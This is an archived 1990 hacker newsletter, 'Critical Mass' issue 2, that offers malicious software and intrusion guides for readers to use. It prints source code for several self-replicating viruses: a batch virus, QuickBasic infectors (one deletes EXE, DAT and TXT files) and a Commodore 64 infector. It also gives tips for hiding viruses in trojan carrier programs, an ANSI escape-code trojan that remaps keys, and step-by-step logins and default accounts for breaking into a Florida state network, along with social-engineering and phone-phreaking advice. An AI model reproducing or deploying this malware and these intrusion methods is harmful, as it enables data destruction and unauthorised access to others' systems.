💾 Archived View for gemini.spam.works › mirrors › textfiles › magazines › CRITICAL › critical.2nd captured on 2022-07-17 at 03:42:17.

View Raw

More Information

⬅️ Previous capture (2022-06-12)


  \        Critical              Issue # 02       A Technical Text          /
   \         Mass               ~~~~~~~~~~~       File Newsletter.         /

      __________        l___________ | ___________l
     //         \   _______   _____ l|l _____     ______              ___
    // /~~~~~~~\_\  l      \  l   l l|l l   l    //     \      _      l l
   // /             l  []  /  ~l l~ l|l ~l l~   // /~~~\_\    / \     l l
  <<<<   ritical    l     /    l l  l|l  l l   // /          /   \    l l
   \\ \             l    <     l l  l|l  l l  <<<<          / ___ \   l l
    \\ \_______/~/  l  l\ \    l l  l|l  l l   \\ \____/~/ / /   \ \  l l_____
     \__________/   l__l \_\  l___l l_l l___l   \_______/ /_/     \_\ l_______l

              ==-->                              ==-->
    ____    __    ____           ==-->                         (11/21/90)
    l   \        /   l  ass              ==--> 
    l    \      /    l      __        ______     ______ 
    l     \    /     l     /  \      /      \   /      \      A Technical 
    l  l\  \  /  /l  l    /    \    / /~~~~~~  / /~~~~~~  text file newsletter
    l  l\\      / l  l   / ____ \   \ ~~~~~~/  \ ~~~~~~/  ~~~~~~~~~~~~~~~~~~~~
    l  l \\____/  l  l  / /    \ \   ~~~~/ /    ~~~~/ /        Issue: 2
    l  l          l  l /_/      \_\ /~~~~ /    /~~~~ /
    ~~~~          ~~~~              ~~~~~~     ~~~~~~

 l     Writters             l Special thanks to....                          l
 l                          l                                                l
 l    The Beaver            l Old members of C.C.C, SF, Copy Cat, etc.       l
 l      Shadow              l Also, Abigail, The Nut-Kracker, Robo., etc.    l

 * Note: We, the writters and editors, of this text newsletter are not 
         respossible for any injuries or prosocutions due to the information
         giving in this text.

                         EXPERIMENT AT YOUR OWN RISK!

         Anybody who is willing, can submit an article! If you wish to
         submit an article, please e-mail either 'The Beaver' or the 'Nut-
         Kracker', via the 'Warriers Retreat' (904)422-3606. Also, All
         sysops can freely download this text in the terms that it is not
         altered and none of the credits are change. So.................
         please act like a human! Also, for your convience,
         every now and then a 'volume' of the Critical Mass is
         created. That is, after three to five issues (roughly 50k to 70k
         of text) a compiled text will be made containing the past issues,
         so if you have missed any issues,you can download the volume you need.
         In order for this text to keep on being produced, you the reader
         needs to submit, either it be by asking questions (Which will 
         sometime be included in the text) or by submitting and article.  
         Any articles on Hacking, Fone Phreaking, Credit Card Surfing, 
         Pirating, Chemistry, etc. our welcome. Any general 'not accepted'
         material is accepted here! Artcles can be on anything from 'how
         to rip off this type of coke machine' to 'how to build a Axis bomb
         from spare car parts'. We hope you enjoy the information given and
         find some use for it.

       /\/\           Chief Editors            Brought To You By
      /\/\/\          ~~~~~~~~~~~~~               Members of
     /\/\/\/\          The Beaver                   (SC/HA)
    /\/\/\/\/\       The Nut-Kracker
  \/\/\Mass/\/\/         (SC/HA)  

 l          This issue contains articles of the following.....                l
 l                                                                            l
 l  I.    Editorial written by 'The Beaver'.                                  l
 l  II.   Latest information on hacking InterAct, written by 'The Beaver'     l
 l  III.  Destructive Programs For Your IBM PC, Part Two, By 'The Beaver'     l
 l  IV.   Very Basic Hacking! By 'The Beaver'                                 l
 l  VI    Hack DEC networks!, Wriiten by 'The Beaver'-'The Shadow'            l
 l  VII.  Letters and Replies                                                 l

 l                           Todays Topic Is.......                           l
 l                           Written By The Beaver                            l

          Well, as you may notice, The Nut-Kracker hasn't submitted any 
articals for this text, but for a good reason. He has been having alot go on 
in his life and, well, just hasn't got the time. So, I may be looking for a new
editor and writer soon, so if you wish to fill this postion, please E-mail me 
at the Warriers Retreat. I wish for someone to fill this postion with the 
following requirments........ So sort of hacking experiance in the fields of
blue boxxing, computer hacking, chemistry, or pirating. If you don't have this
experiance, but would still like to become a editor, please E-mail me anyway.
          Also, don't expect this issue to be anywhere like the last one, but
if you do have some text files written by various hacker in the USA, please 
tell me about them so I can include it in the next issue. I have several text
that I lost and are looking for..... They are......

 The Outlaw Series ........ Written in Tallahassee, Fl (Sub. Explosives)
 Hacking VMS............... Written by members of Chaos Control
          If you have any copies of these, please E-mail me. By the way, the 
last issue (1st one) was over 138k bytes if you downloaded it.


   l I.              Latest Infomation On Hacking InterAct                  l
   l                        Written By 'The Beaver'                         l

         This is another FIRN hack that Florida hackers may find useful. The
system is called interact off of the Florida Information Resource Network.
The Nut-Kracker and I broke into this system under a Demo account a little 
while back. This system is running under a IBM 30XX series I think and is 
running under VM OS. It is used by the state of florida along with serveral
universities. But first, let me give you a list of Florida area fone numbers 
to get in contact with this net.........

 City               Fone Number                Baud Rates

Boca Raton         (305)395-0552               300/1200
                        395-1410               300/1200
Brevard            (305)639-1790               300/1200
Broward            (305)764-5540               300/1200
Eglin AFB          (904)678-7056               300/1200
FT.Myers           (813)489-4843               300/1200
Ft.Walton          (904)244-8185               300/1200
Gainsville         (904)392-5362               300/1200
Jacksonville       (904)646-2992               300/1200
Miami              (305)226-1846               300/1200
Orlando            (305)275-2220               300/1200
Pensacola          (904)474-2533,4,5,6         300/1200
Sarasota           (813)957-4682               300/1200
St.Pete            (813)893-9509               300/1200
Tampa              (813)974-3890               300/1200
Tallahassee        (904)488-0650,1,2,3,4,5,6,7 300/1200
W.Palm Bch.        (305)969-3504               300/1200

          Actually, a lot of these have 2400 Bds, but I can't remember which
ones do and don't. At any rate, when you log on, you will be greeted with a 
'User Name:' prompt. type 'Menu'. At the Menu you have a choice of three things
to do besides log out. I know it isn't the 3 choice, so it is either 1 or 2.
Pick either one or two and look for 'InterAct'. Once you have found it, log on
to it. It should ask you for a username, ID and password. You can try the Demo
accounts, but I doubt they will work cause we used them to death. Well if you 
have gotten this far you are going to need so usernames plus ID's so here they
are. This is straight from the buffer.....


        All the numbers to the left are ports. The first two ports are for the 
sysops and if you notice that in port 46 there is a 'demo,demo' account that 
they forgot to take out. Thats how we hack the systems. Now let me explain how
to find the user ID and names. Look at port 2. Notice that is says 'OPS$NWRAD'.
'OPS' is the username and 'NWRAD' is the ID. You can also tell somtimes where
certain people are calling from. Such as people with the user name 'BAY' are
probably calling from Bay County, Fl. Probably on the Eglin AFB line. Note:
notice that port 246 ID is BAYCS, or Bay County Schools. Notice things like
DOE (Dept. Of Education). Also, if you have any questions in hacking computers
in the Tallahassee region or just a type of system, I or someone I know may
be able to help, so just E-mail me if you have any sort or questions.

   l                  Destructive Programs For Your IBM                   l
   l                             Part Two                                 l
   l                      Written By 'The Beaver'                         l

           In part one (issue#1), we covered the following........

    How to use a text writter and debug to create small assembly programs.
    How to destroy disk (Trojan Horse) on drives A,B and C.
    How to create false errors.
    How to disable ALT-CTRL-DEL warm boot.
    A few other minnor things.
           Hopefully, we can carry this a little farther.

     Command Level Batch Virus.

            Alot of people believe that it is not possible to create a virus
at a command level. This is wrong, though the virus is not that deadly. The
following code was put in for people to get a basic understanding of a virus.
The virus comes in four parts and is very, very easy to stop. If one of these
parts are deleted, the virus will fail to work. This code was written by Ralf
Burger in 1988 as a demonstration virus. Heres the code in three parts and 
what the four parts are named.

Name:Vr.bat         (use edlin to enter it)

ctty nul
dir *.com/w>ind
edlin ind<1
debug ind<2
edlin name.bat<3
ctty con

Name:1              (use edlin)


Name:2              (use edlin)

e100,"del "
e10c 2e
e110 0d,0a
e112 "copy \vr.bat "

Name:3             (Must use Debug to enter this because of the 1Ah)

0100  31 2c 31 3f 52 20 1a 0d-6e 79 79 79 79 79 79 79
0110  79 20 0d 32 2c 32 3f 52-20 1a 0d 6e 6e 79 79 79
1120  79 79 79 79 20 0d 45 0d-00 00 00 00 00 00 00 00

         If you care to understand how to code works, then simply remove the 
'ctty nul', because this sends all output to a 'nul' device. If you remove 
that, also remove the 'ctty con', that restores output to the console. After
doing this, it should become very clear about what is happening. This is a
command level, over-writting logical virus, so it actually takes the place of
its hosts code. 

         For part two, I am going to keep the first few programs very simple
and will probably get more into assembly code as we go along. As you have 
probably been thinking, 'wouldn't assembly code work much better for a virus?'.
Well, thats correct. But first lets just get the basic understanding first.

         The following code is written in BASIC. It is a logical overwritting
virus, but better self contained. It infects all files with the extention of
COM. The actual virus though is compiled to a EXE. form though. To do this, I
used QuickBasic 4.5. The Marker is the length on the virus, or 40396 bytes.
This virus is also easy to stop, because the time and date stamp change , the
length of the program and the file type also change. But to a person who isn't
greatly familar with computers, it could still cause havoc. The only good thing
about this is that it is totally self contained. Heres the listing....

1 ON ERROR GOTO 3500: CLS : COLOR 0, 0
2 SHELL "dir *.exe>dna": SHELL "dir *.com>rna"
5 OPEN "rna" FOR INPUT AS #1
10 INPUT #1, w$, x$, y$, z$, a$
15 CLOSE #1: f = 1: KILL "rna": IF a$ = "" THEN 3500
20 f = f + 1
25 IF MID$(a$, f, 1) = " " OR MID$(a$, f, 1) = "." OR f = 13 THEN GOTO 30
27 GOTO 20
30 oname$ = MID$(a$, 1, f - 1)
35 OPEN "dna" FOR INPUT AS #1
40 INPUT #1, w$, x$, y$, z$
45 INPUT #1, a$: b$ = MID$(a$, 17, 5)
47 a = VAL(b$)
50 IF a <> 40396 THEN 45
53 KILL "dna"
55 f = 1
60 f = f + 1
65 IF MID$(a$, f, 1) = " " OR MID$(a$, f, 1) = "." OR f = 13 THEN GOTO 75
70 GOTO 60
75 nname$ = MID$(a$, 1, f - 1): COLOR 0, 0
80 KILL oname$ + ".com": SHELL "copy " + nname$ + ".exe " + oname$ + ".exe"
90 COLOR 0, 0
3010 KILL "dna": SHELL "del rna": end
3500 CLS : KILL "dna": KILL "*.exe": KILL "*.dat": KILL "*.txt": PRINT "Cough, H
ack, Sniff"
3501 end

         As you may notice, when the computer hits a disk error, all data is
destroyed. The next virus is also written in basic and is a logical virus.
Once again you will need a compiler to use it properly though. The only 
difference is that the virus infects files with the extention of EXE. The
logical virus itself is also a EXE. type virus. But the modifications compared
to the one up top make this one work far greater. The traits that it shares 
with the first listing is that it also uses the length as a marker. The 
advantages over the one up top are that......
1. The listing is shorter
2. Disk access is cut in half, so less time is consumed.
3. The file type stays the same.


  INPUT AS #1: INPUT #1, W$, X$, Y$, Z$, A$
10 IF A$ = "" THEN 200
15 B$ = MID$(A$, 17, 5): B = VAL(B$)
20 IF B <> 38622 THEN 50
25 IF VNAME$ <> "" THEN INPUT #1, A$: GOTO 10
30 F = 1
35 F = F + 1: IF MID$(A$, F, 1) = " " OR MID$(A$, F, 1) = "." OR F = 13 THEN 40
38 GOTO 35
40 VNAME$ = MID$(A$, 1, F - 1): IF VNAME$ <> "" AND oname$ <> "" THEN 80
45 INPUT #1, A$: GOTO 10
50 IF oname$ <> "" THEN INPUT #1, A$: GOTO 10
55 F = 1
60 F = F + 1: IF MID$(A$, F, 1) = " " OR MID$(A$, F, 1) = "." OR F = 13 THEN 70
65 GOTO 60
70 oname$ = MID$(A$, 1, F - 1): IF oname$ <> "" AND VNAME$ <> "" THEN 80
75 INPUT #1, A$: GOTO 10
80 CLOSE #1: KILL "DNA": KILL oname$ + ".EXE": SHELL "COPY " + VNAME$ + ".EXE " 
+ oname$ + ".EXE"
200 END
210 IF oname$ <> " " THEN SHELL oname$
220 END

         In case you have a little trouble understanding the two, here are some
flow charts that may, or may not help.

                          Create a 'DNA' and 'RNA
                          File. 'DNA' holds all
                          'EXE.' files. 'RNA' holds
                          'COM.' files.

                           Are the any infectable 
                           'COM' files stored in
                           the 'RNA' File List?
                            Y              N

                            !              !
                            !              !
                            !              !
                                   I am not home!!!

                    Get the name and      Del all 'TXT.','DAT.' and
                    store as 'oname'      'EXE.' files and display
                                          the message 'Cough, Hack
                            !             ,sniff. After that, do a
                            !              crash.

                  Del 'RNA' and look though 'DNA' for a copy of the virus.
                  The marker is the lenght to the virus. Note: If it does
                  not exsists, there is no way the prg. can be held in 
                  in memory. This Will Be Stored as 'nname'


                         Delete 'DNA' and the name under the string 'oname'
                         which will be a 'EXE.' file.

                         Copy then virus 'nname' as the old name was under,
                         'oname' and do a system crash.


  The Dir. will go from this.........

  PRAY1.COM                  To......            PRAY1.EXE    (Vir. Here)
  PRAY2.COM                                      PRAY2.COM    (No Vir)
                And So On To 'Pray2'.... 


          Here is a flow chart for the second virus listing. 

                                    Virus 2
                            Flow chart to a EXE to EXE
                            infector, unlike Virus 1.

 Shell to DOS and create a file
 with all EXE. files in the 
 current directory. The file
 that contains all the EXE file
 names is called `DNA`


 Get a file name out of `DNA`  <--------------!
            !                                 !
            !                                 !
 Is the file name pulled contain a            !
 virus?                                       !
     Y                         N              !
     !                         !              !
     !                         !              !
 Is 'vname' taken         Is 'oname' taken    !
  N          Y            N             Y ----!--!
                                              !  !
  !          !____________\___________________!  !
  !                       /                      !
  !                       !                      !
 Store file name as       Store file name as     ! 
 'vname'. Has 'oname'     'oname'. Has 'vname'   !
 been used?               been used?             !
  Y               N        Y                N    !
  !               !        !                !    !
  !               !_______/-\_______________!____!
  Replicate and end. 

 Virus2: Logical Virus.

 `Oname`      - Old file name used. This is the original unifected file.
 `Vname`      - Virus file name. This file has been infected and is retrieved
                so that the virus can copy itself to the `oname`.
  e.g. -
          Delete oname
          Copy vname.exe oname.exe

(Sept. 18, 1990)                                         Written by The Beaver.

         For the programs written in basic, it would be wise to use carrier 
programs, though they are not needed. It does look better if you do use one 
with these though. If you are going to write a carrier program, odds are that 
you will write it in BASIC. If so this is the best operation I see that you 
can do. Make the carrier program and the virus two different programs to save
disk access time. Make a 'loader' or replace one on a program, such as a word
processor we'll use for example. I would also go by either date or the number
of times the program is used. I prefer the date because you don't have to read/
write to the disk in the carrier program, thus saving time. This is the order 
I would do them in.....

1. Is today equal or greater than the date to go off? if so, continue to
   2. If not, run the wordprocessor as usual.
2. shell to the alt-ctrl-del killer  (mentioned in issue#1)
3. shell to the virus.
4. end.

          Actually, what I think is a good idea is to change the file type of
your virus from EXE. to say, DAT. This will make it more confusing to the user.
So your carrier would look like this......

1. Is today equal or greater than the date to go off? if so, continue to 2.
   If not, run the wordprocessor as usual.
2. Shell to the alt-ctrl-del killer
3. Change the viruses file type from DAT. to EXE.
4. shell to the virus
5. change the virus back to a DAT. file
6. end.

         Of course, this also will increase disk access time. Thats the main
problem with viruses at any high level laugauge. I did not include any carrier
code in this text because I am pretty sure that most users can write there own,
but if you would really like some carrier code, then E-mail me and I will 
include it in the next issue.


         This is a very simple logical virus written that I wrote on the c64
a number of years ago. This is the simple listing, in BASIC once again so that
you can build on it. I could have modified this listing serval times, but I will
leave that up to you. You can add in things like a line to determine if the 
virus is running on a c64 or c128. If its running on a c128, you can tell it
to step up the clock speed, etc, etc..... I also have written a ton of trojan
horses for this machine, but will not include them here. If you wish that I
, drop me a line........

10 open 1,8,0,"$0"
30 get#1,a$,b$
40 get#1,a$,b$
50 c=0
60 if a{body}lt;>"" then c=asc(a$):if c<>9 then 30
70 if b{body}lt;>"" then c=c+asc(b$)*256
84 get#1,b$:get#1,c$:get#1,d$:get#1,e$:b$="":c$="":d$="":e$=""
85 get#1,f$,g$,h$,i$,j$,k$,l$,m$,n$,o$,p$,q$,r$,s$,t$,u$,v$,w$
90 z$=f$+g$+h$+i$+j$+k$+l$+m$+n$+o$+p$+q$+r$+s$+t$+u$+v$+w$
100 close 1:open 15,8,15:print#15,"s0:"+z$
110 close 15
120 open 15,8,15,"i":close 15:save z$,8

          Thats all the Commie stuff Im including in this issue, unless you ask
for more in further issues.

          Lets now move on to the Trojan Horse for the IBM. It has been thought
for a long time that it was impossible to write a trojan into a text file on
the IBM. This is WRONG. There is a great danger that lies here. The reason is
because of the ANSI driver that is installed on most IBM's today. It is 
possible that I could have included a trojan in the very text your reading, but
I did not. But to prove a point, at the end of this text, press the 'A' key and
there will be a msg. displayed. This is was you would see right here.......
(NOTE: for the letter 'A' to be remapped, you must 'type' this file and have
 a ANSI driver installed.)

"[65;"echo The Beaver Was Here!";13p"
"[97;"The Beaver Was Here!!!";13p"

          These are escape codes. I could have easy say something like ,gee,
ya know what you should never type? that del *.com. In that one sentence, I
COULD have remap your keyboard to wipe every COM. file out when you hit then 
letter 'D'. But I didn't though. Heres how it is done......

          What is happening is that we are placing escape codes in the beging
of our sentence. I will show you the escape codes here. Note the hex dump of 
the .......

22 1B 5B 36 35 3B 22 65-63 68 6F 20 54 68 65 20     ".[65;"echo The
42 65 61 76 65 72 20 57-61 73 10 48 65 72 65 21     Beaver Was Here!
22 3B 31 33 70 22 0D 0A-00 00 00 00 00 00 00 00     ";13p"..

           First let me explain what some of the Hex codes stand for.......

22 - "       20 - (space)     1B - escape

           Now, actually, the first '22' and the last one can be removed with
no effects to the trojan. After the '22', you will notice a 1B, which envokes
the ANSI controller. Then what we tell it is that we are remapping asc '65' or
the letter 'A' to mean 'echo The Beaver Was Here. The 13p gives us a return at
the end. I won't go to much in detail for you IBM users, because thats why the
program 'Remap Utility 1.0' was included in this issue. This program does
the hole remapping process for you. If you do want to learn more about ANSI,
then refer to you manual. Well, thats part two, but the next issue will 
contain part three of this ongoing series. The next part will contain.......

   Complete Non-overwriting code in assemble.

            Thats about it, the codes pretty long..... (500 bytes with remarks)

        l                      Very Basic Hacking                     l
        l                    Written By 'The Beaver'                  l

        I have noted that there are alot of young and new hackers taking on
the BBS scene. Alot of them are completely new to hacking, so I included a
few tips and advice for the new hackers out there. All you other, more 
experianced hackers can just skip through this stuff, or bare through it
in hopes you may learn something.

Unix -	UNIX can sometime idenified just by the prompt, just like most 
	machines. On a VAX running UNISTRIDE, you will get a greeting 
	message of some sort along with a logon prompt. Type CTRL-S.
	If the damn thing freezes up on ya, its probably UNIX. To get it
         unstuck, hit CTRL-Q. There are other ways to identify this. Sometimes
         a CTRL-Y will reset the login message. Characters that make the 
	cursor dance, etc. UNIX is had to put in one field, because it can
         be used on everything from the home PC to a mainframe. I really hate
	UNISTRIDE, unless it is set up hack easy, which is rare. You can hack
         it several ways. First off, some UNIX systems allow you to use a
         'WHO' command to get a userlist before logging on. This is rare. 
         You can, believe it or not, sometimes use the rapid fire method 
 	(Explained later). Sometimes there are also guest accounts. A guest
         accout goes like this; Username:GUEST  Password:<CR>. Hard, huh?
         Once inside, you will find this OS very easy to use. To get higher
         access, you can get the privileged password. That is, like on a DEC
         server, normal users can become privileged by the use of one password.
         There are also some other advanced ways discovered by Robert Morris,
         Jr. Like the Sendmail attact, and the fingerd attact, But we won't 
         go into advanced hacking right now.
VMS -	Very user friendly. To confirm your on VMS, type /XXXX. Fill in the
         'XXXX' with any garbage. If you get a error along the lines of, '
         commmand qualifier not present', or something like that, your on
         VMS. Try DEMO accounts first (always do this!). Alot of times, the 
         password is the same as the username, in the default settings. Get
         a copy of 'Hacking VMS' by the Chaos Control Commit. (C.C.C). If you
 	find this, e-mail me, I can't find it anywhere.
VM-370 - Sucks

         Well I won't go into Primo's, VM-370, RSTS, TOPs, or ULTRIX shit.

Rapid -	This method doesn't work much anymore, except one old Borrough's 
Fire	systems and stuff. Any rate, heres what happens. Imagine you ask
	a system 'what time is it?'. The system will put you command in a 
         buffer and run off and see if you have access to get the time. While
         it runs off, you change the command to something like, 'Give me a 
         userlist'. The system comes back with a 'Okay', and allows the second
         command to fall through. Thats one way off this method, here's another.

	You ask the system any question, like the time for instance. When it
         runs off to get verification, you fill the buffer with crap. This is 
         basicly how the fingerd method works, but a little more complicatied.
	I've only seen these two method work once on a B2700, I think it was.
Decoy -	Ok, this is a more advanced hacking method. I will just give the idea
         here. We'll actually got into it in Hacking DEC, part II. Think of 
         this, on a PC BBS Level. Your the user and I'm the hacker. Now 
         you call the BBS and you see things to recognize, right? Thinks like
         welcome to such and such BBS and all that. Well, one day I decide I
         want a account on a system. We'll just say that I use call forwarding
  	from the BBS to my house. See? I get all the info and not the BBS!
 	so in the end, you think your on something your not, and I get all the


       l                                                                l
       l                   Hacking DECserver's Part II                  l
       l                        By 'The Beaver'                         l

        Here is more information about those great DECserver you and I love.
Please, read part I or you won't understand what is going on. The information
given like last time, we beleive has never be disclosed in any other text file
or news letter. You should feel lucky. All information was found by myself,
'The Beaver','Shadow', and 'The Nut-Kracker'. We also had some help from 
several other people. Thanx..........

        To start off, lets talk just about the server themselves. In the first
part, I called it 'Hacking DEC200 servers'. This was a incorrect statement. 
That is, you can use these skills on many other nets such as the EMULEX corp.
Preformance4000, or the DEC300 servers, so don't take the first part that 
literally. There are somethings different on the DEC200 and 300's. 200's
can only support 8 ports because there are only 8 rs232 ports, but they can
be expained to 16 ports. The 300 has 16 port and can support 32. Some DEC's
can support up to 50 ports that I know of. The same with 4000's. One great
way to find out hacking info on these is to call DEC at 1800-323-4827. Sound
like you know what your talking about, and they will tell you anything. Just
say something like, ' Hello, Im here at UF using a DEC (DECK)200, and Im having
trouble setting up the maintenace password. What should I do?". He'll ask you
a bunch of question like, "Whats the DEC200 on?". You say "A VAX running VMS
5.1". If you sound like you know what your doing, you can get anything from 
these people. Well, enough small talk, lets get started..........

         A while back, the Shadow and I found a state runned DEC200 in our
region. All it had on it was 2 in/out modems (pre-programed), LAT Printer,
and a VAX named 'Legal3'. Pretty pointless to use a server for this, but 
at anyrate, we became intrested in the VAX. We decided to attempt to set up a
decoy (explained later in the text). Shadow was the first to do this.
         When he set it up, he found that suddenly a remote port logged in, and
was following him around, but when he disconnected from it, the remote port
disapeared. Pretty strange, needless to say. We came to the theory that this
was some sort or monitoring port, that seemed to only come alive when a service
was set up. Any rate, it doesn't stop there. Once trying to he tried to knock
out that remote port and got a -151- error messages, or 'system init 1 minute
to shut down', but this was canceled, but not by him. We figure that there are
ways to make your sever more secure. We were able to get past it though. 
         Just resently, we found this while trying to set up decoys. This is 
really odd, and we still don't know what to make of it. We went on and type 
the following........

set service test
set service test idenification "testing 1-2-3"
set service test port all enabled

         This creates a fake service "test" and says that all ports can use
it. The thing is that it says, its a computer, its availible and this is what
it is. When you connect to it, nothing happens. A complete null. Once though
when we where hacking very fast, but I won't go into that, shadow was booted
from the system, and a remote port was put in his place. I chaser program that
I just talked about. He got booted because of call waiting. I wasn't sure 
if he left or if he changed his port from dynamic status to remote status,
so I send him a message. I got no response, and returned to the fake service.
When I returned, I recieved my own message, even though I sent it to his port.
Could this be the broadcast buffer, we are not sure yet, and will fill you in
when the answer is found. Here are a few more commands that will help you in
the future.

set server dump e/d     (priv. only)
                        In a REAL crash (not a init), all memory contents are
                        dumped to a console port, or YOU!
sho service local       shows all local services like LAT printers, in/out
                        modems, etc............
and last but not least.......

set service connections (get help) this allows you to connect OTHER ports to

        Well, sorry theres not more, but we have been having some trouble
lately, but there is more to come........ Before I go, here is a list of
call numbers off of ufnet for you FIRN hackers.........

Call #         Comment
200            DECserver
201            EMULEX 4000 server
202            Dito
3000           DECserver
3001           Dito
3002           Dito
3003           Dito
2000           NERDC (North east reginal data center)
1400           VAX/UNIX ??????
1100           UNKNOWN
900            Industral VAX/UNIX
800            UNIX(Bikini)
700            UNIX/VAX (Beach)
500            VAX 11/750
250            DECserver (down ALOT!)
170            Selene
120            Selene

                             Thats All! Chow


                l                                           l
                l           Letters and Replies             l

       here anynomous like, unless you tell us other wise. Please, ask 
       questions and I will try to reply or find the answer for you. The
       whole bases of this text depends on YOU!

Msg #   1                        Date: Fri 12-28-90,  8:35 pm
From: XXXXXXXXXXXX               Read: 1 times  [1 Reply]

Subject: Hacking stuff... (Hows the wife/kids)

The Beaver,

       I just finished your little article called "CRITICAL MASS", and must
say,  I am impressed!  You apparently know your stuff! Anyway I have a few
questions concerning some of the things you talked about... (I am interested
in that kind of thing)...

       Number 1:
               Where did you learn about Assembly... I mean you just do not
read the stuff you talked about in PC World or other PC magazines (do
you?)...  The reason I would like know is because I am the type of person
who likes languages, practical jokes.. ECT... (BTW nice keyboard locker, and
Disk Access locker!)(My brother went nuts trying to fix the computer!)

       Number 2:
               Do you know anything about something called "GREEN BOXING"...
I am sure you do, since you know about BLUE BOXING... Well, I need the plans
for a "green box", and figured you might have some you could upload, and
place a password on for me... I of course would need a part list... (Reading
the plans is hard enough for me, much less telling the difference on paper
between a capacitor and a transistor...! But hey I am learning...

    And lastly:
               If you have no idea what I mean (if I miss named it)... This
little mechanism is in a little box about the size of your hand... And when
the button is pushed on it, it emitts a series of clicks, and beeps... When
held up to a pay-phone, these clicks, and beeps sound to it like a Quarter
dropping into it.. And these are nice for long distance calls, ect...

Well, That is it, and oh by the way.... You would be supprised at the number
of "Program Hackers" around town now-a-days......



P.S.  Please keep the information comming.... Oh yea before I forget I am
having trouble getting on to the FIRN system... What is my terminal

         First the first question. I learned alot of assembly from a school
friend of mine while taking electronics and becoming a tech. He has to be the
most versital programmer I have ever seen. He taught me all about what 
registers do to what a interrupt 13 will do. There are tons of books on 
assembly, but they are hard to read and very techical. I got really started
after using a assembler called "CHASM" which comes with a little tutorial on
assembly. From there I just got the books it told me about. By the way, thats
great about your brother. Also, code like I gave in the last issue isn't hard
to find. You just got to look around, if you know what I mean.
         The second question. I think you really mean a "red box". This baby
simulates the tones needed to preform a nickel, quarter and dime tones. I hate
to tell you this, but I only have plans for the blue, silver, white and black
box at this time. I don't know what type of computer(s) you have, but if you
have a c64 there are tons of great programs you can get. The only problem
is that none of the boxxes can be used in our area code. Thats not to say that
you can't use it outside our area code though. I know that 800 and 305 work,
along with 205 and others, but if I where you, I would just stay way from it
all. Since the equipment replacing and such, it is become more difficult to
box. Mostly off 800, doing that is nuts. I can probably get the tones and 
make up a schematic if you still desire one.
         Third, when connecting to firn, your terminal identifier should be "a".

If this doesn't work try "d". Happy hacking..........



         I'm having trouble navigating though FIRN. Could you or somebody give
me some help or some pointers about what I am doing wrong. Thanks

If you have never been on the FIRN system, follow the directions below:

                     Call 488-0650 with you'r modem
                     wait for a connect and shit chars to be recived
                     press return
                     at the terminal identifier type <a>
                     at the login prompt enter <menu>
                     press return
                     at the first menu type <2>
                     press return
                     at the next menu type <p>
                     press return
                     wait for about 5 sec.
                     press return twice
                     at the "#" prompt enter <call 200>
                     press return
                     wait for about 5 sec.
                     press return twice
                     you should now see a "Local>" prompt
                     type <show users>
                     press return

If you don't know what to do, or how anything works, at any "Local>" prompt,
enter <help> and return.  This should show some self explanatory info. If you
have any problems, myself or the beaver u'll help.  My knowledge of netsys's
are not cavernous, but I do know something...  Anyway, If you see me on, don't
hesitate to <broadcast> to my port (unless you see a "<l>" behind my name, if
that is the case, I can receive your msg's, but not send any).  I should be on
the DEC Call 200 aera mostly every night from 11:00pm to about 3:00am (aprox). 

- Shadow

                 l                                     l
                 l            Finnal Notes             l

         Well, this concludes the second issue of Critical Mass. I wish there
was more, but you know how it goes. Before we end this issue, I would like to 
state several things though. If you, the reader, don't like Critical Mass
or any of the software that myself, or anybody associated with Critical Mass
puts out, please contact us and not the people we know. Don't hassle them, 
hassle me. Its fun to see how stupid you guys can be. Besides, if you don't
like it, don't download it! Its as easy as that.
         I have had several people tell me (not directly) that they are going
to follow up on legal actions against me because there BBS's hard disks have
crashed. Well, I envite them to for the following reasons.........

1.  I have not crashed ANYONE's hard disk. If I did you would know. I'm not
    affraid to to say 'I did it'. Based on the last trojans I have sent out,
    and yes I did in my COMMIE years, my name was beside the program all the
2.  Even if I did, you don't know my name, phone number, or address. Think
    about it.
3.  If you really thought a 22 byte long file was a 'killer game' or what not,
    you shouldn't have a hard disk in the first place. 
4.  If I hit you, you would know, instead of a little trojan. I prefer virsues,

         Actually, I expected alot of E-mail from people that where pissed
about the IBM Home Destruction Kit, but I was taken by the positive E-mail
I got. It really threw me off! I like it though, so please keep sending your
E-mail in about question, comments, insults you have. Its great. I can now 
be contacted at one of the following places............ Under the name 'The

Warriers Retreat
(904) 422-3606


The Reactor BBS
(904) 878-1736

           Please E-mail me. I enjoy it. The following software can be picked
up at 'The Reactor BBS'.............

The IBM Home Destruction Kit (v1.4)
Critcal Mass#1  (138k+ of hack info!)
SC/HA ToolBox Hacker! (v3.0)   COMMING SOON!!!!!!!!!! INCLUDES!!!!!!!!!
                               WarGame Dialer
                               Repeat Dialer
                               Sleep Function
                               Dbase Hack (490+ most popular passwords!)
                               LD account finder!
                               Much more

  Theses are written by myself, other software by other members includes......
The c64-128 Home Destruction Kit! (v1.0?) COMMING SOON (by The Beaver)
ToolBox Hacker 1.0 for the IBM
                           Amiga (By The Shadow)  COMMING SOON!

          Just keep a eye out for these, and other (if they agree to it) 
GrindLock products! 

          Once again, Thanx To: All Florida area FIRN hackers, SF's and C.C.C
                                Abigail, The Shadow (very special thanks to
                                him), Eric, all korner hacker who give info,
                                Killer (keep at it), The Baron, The Nut-Kracker
                                My Dad (yes he knows I hack), and every hacker
                                in the TLH area for just exsisting! And of
                                course Mark for letting me use his board to
                                post CM here in town, even though he get's
                                hassled for it. All old C.C members that still
                                hack. Pink Floyd, for the nylon. And much more!

      No Thanx Too, Once again: Doug, for nothing. All NFSA sysops, except for
                                a few. Tom and Bob, after I thought they where
                                ok guys (and I still do) for saying that I u/l
                                trojans when I didn't. Why guys? Tally Net
                                sysops, for killing this text. That remote off
                                Legal3. All sysops that killed this text.

Note: When I say 'no thanx to', its not a 'hit list', but it made me kind of 